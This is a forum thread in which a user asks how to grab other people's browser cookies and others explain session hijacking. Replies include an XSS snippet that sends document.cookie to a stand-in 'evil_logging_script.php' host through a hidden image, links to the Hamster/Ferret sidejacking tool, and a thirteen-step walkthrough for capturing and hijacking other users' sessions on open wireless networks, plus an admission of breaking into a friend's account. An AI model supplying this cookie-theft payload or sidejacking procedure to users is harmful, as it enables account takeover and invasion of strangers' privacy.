1) is it illegal?
2) how can i do it?

thanks!

grab cookies frm ur own com?

others com =/

Pay Famous Amos to sell you some ba.

Anyway,

1. It may be considered as an invasion of privacy. Don't you just love those spywares lurking somewhere within your computer, or the list of tracking cookies that shows up during your monthly clean-up?

2. Technically it is not supposed to be possible through a web script, as cookies usually can only be accessed within the same domain. So for example, if you want to grab cookies created at sgForums.com, the script must be hosted in sgForums.com as well. But some almost-genius in the past have managed to do so through cross-site scripting and SQL injection due to vulnerabilities in scripts. (Hint: sgForums is rumoured to be using a very old version of phpBB. XD) Google those terms if you are interested.

So, unless you plan to come up with a desktop solution, as in a spyware or some of its counterparts, in conclusion, this is not possible.

Technically possible. There's even a tool to do that. Those who went Defcon or Blackhat will know.

What’s does grabbing cookies do?

Cookies contain log in and session information. Grab that of course to steal password or to hijack a session.

Session is the time between you log in to a website and the time you log out of a website.

so i guess i’m not allowed to learn how to do it?

and thats how i lost my neopets account which was still hot at that time on a window 98 system with no knowledge of firewall or any anti virus system..
till one day some1 conned me into his website and thats it.. my 2yrs effort gone down the drain..

Originally posted by ndmmxiaomayi:

Technically possible. There's even a tool to do that. Those who went Defcon or Blackhat will know.

Shi meh? So far I only heard of traffic sniffing in wireless networks and XSS, now got tools to facilitate cookie stealing one ah?

Originally posted by HygieneSetsco:

so i guess i'm not allowed to learn how to do it?

Hmm there are plenty of sites out there to learn about XSS and SQL injection. But the issue here is about finding a vulnerability on a website that, say, that will allow you to post unencoded HTML. So to grab cookie contents, you would probably write something like:

                        

                        

                        var url = 'http://example.com/evil_logging_script.php?cookie_contents=' . document.cookie;

                        document.write('');

                        

                        

So for example, if you could plant this code into a forum post, as "raw" HTML, everytime the post is loaded, the browser will attempt to load a 0 pixel by 0 pixel (aka unseen) image using the URL which is embedded with the user's cookie information. And on the other side, when the "image", which is a script, receives the request, it ignores it and does something like storing the cookie information that was passed to it through the URL.

But most scripts around filters all these HTML tags from user input so it is quite pointless unless you really have so much free time going around to try this out on different websites.

If you are really interested, you can read on the technical explanation of the infamous MySpace worm, aka Samy Worm. It does not need to steal cookie - it uses the victim's computer to do what the coder wanted. Also, another reason why you are less safe using IE than other browsers - under Step 1, "However, some browsers (IE, some versions of Safari, others) allow javascript within CSS tags. We needed javascript to get any of this to even work".

http://namb.la/popular/tech.html

chimchim

i still rmb i hack my friend's neopets account using cookies. . it was like 6 yrs ago..

but now technology advance too fast. the login information will change if the person log out from his account.

Originally posted by LatecomerX:

Shi meh? So far I only heard of traffic sniffing in wireless networks and XSS, now got tools to facilitate cookie stealing one ah?

Ya, bluff you no money. Google some keywords and you will find that tool. I played with it, pretty cool tool.

Originally posted by ndmmxiaomayi:

Ya, bluff you no money. Google some keywords and you will find that tool. I played with it, pretty cool tool.

Got lo. I just gave you my 2 cents. =P

Anyway, is the tool related to this article, or some other stuff?

http://blogs.zdnet.com/Ou/?p=651

Originally posted by LatecomerX:

Got lo. I just gave you my 2 cents. =P

Anyway, is it related to this article, or some other stuff?

http://blogs.zdnet.com/Ou/?p=651

Yes, it's related to this article.

Originally posted by LatecomerX:

Got lo. I just gave you my 2 cents. =P

Anyway, is the tool related to this article, or some other stuff?

http://blogs.zdnet.com/Ou/?p=651

latercomer also pro ah

Originally posted by LatecomerX:

Got lo. I just gave you my 2 cents. =P

Anyway, is the tool related to this article, or some other stuff?

http://blogs.zdnet.com/Ou/?p=651

chim la hong gan

Originally posted by yiha093:

chim la hong gan

Not really lo. Simply put, he's catching cookies in the air. So just be careful when surfing on public wireless hotspots - you never know if mayi is there. XD

Originally posted by LatecomerX:

Not really lo. Simply put, he's catching cookies in the air. So just be careful when surfing on public wireless hotspots - you never know if mayi is there. XD

i undersrand this
chim la

Originally posted by yiha093:

i undersrand this
chim la

Hmm, try this. They have "packaged" it to an all-in-one.

http://www.erratasec.com/sidejacking.zip

from

http://erratasec.blogspot.com/2007/08/sidejacking-with-hamster_05.html

hey @ LatecomerX, are you able to use it?

Nope, I didn't get a chance to. I don't own a laptop, and people who are still on those "unsecured wireless networks" with routers within the range of my adapter are kinda rare.

Anyway, there's a readme.txt and a Word document that should be able to guide you in getting the hamster running, not literally. And here's the link to download WinPcap.

http://www.winpcap.org/install/bin/WinPcap_4_0_1.exe

And here's the content of the readme.txt file.



If you encounter problems with one of the steps, maybe you could post a screenshot back with details onto this thread and wait for a reply, from mayi hopefully.

I have just finish reading the included word document, and I can say that it is really helpful as it includes a step-by-step guide containing many screenshots; you would probably skip the chunk of text under "Sidejacking without Hamster" since it is a little advanced.

Just to summarize things up a bit, mostly similar to their readme.txt,

1. Install WinPcap.
2. Unzip the contents of sidejacking.zip to C:\sidejacking or anything simple
3. Hit Windows Key+R, run 'cmd' without the quotes
4. In the black box that appears, type in 'cd C:\sidejacking' and press Enter. The next line should start with the same folder name as well.
5. Type in 'ferret [dash]W' and Enter. If you get a packet.dll error, you would probably have forgotten about installing WinPcap
6. A list of connection interfaces should then appear. Remember the number that represents your wireless device.
7. Use a browser that you don't usually use, eg. IE. And configure its proxy options. Instructions for IE here.
8. In the black box, type in "ferret.exe [dash]i [Number from Step 6]"
9. Type in 'start hamster' thereafter. If you see a 'hamster.txt: No such file or directory' error, it means you screwed up somewhere along, or my summary is missing something. Always believe in yourself first. =P
10. After setting up the proxy options at Step 7, go to 'http://hamster/'
11. You should see a list of IP addresses here. Click on one of them.

Extra, non-essential info:
I'm quite inexperienced in networking, but I suppose those are IP addresses which are only used within the network to identify users so that the router or whatever knows where should each data packet go to. This has nothing to do with cookies, btw.

12. Click on one of the links on the left panel.

You have three options here. You can view the raw cookies for this IP address (discussed below). You can click on a URL that has a HIGHER probability of being Sidejacked. Or you can choose from the URLs below, which have a lower probability of being Sidejacked.

13. You did it, you jackfruit! gratz.

And a disclaimer: this is solely for educational purposes. No ferret or hamster was harmed while I was experimenting with the tools. =P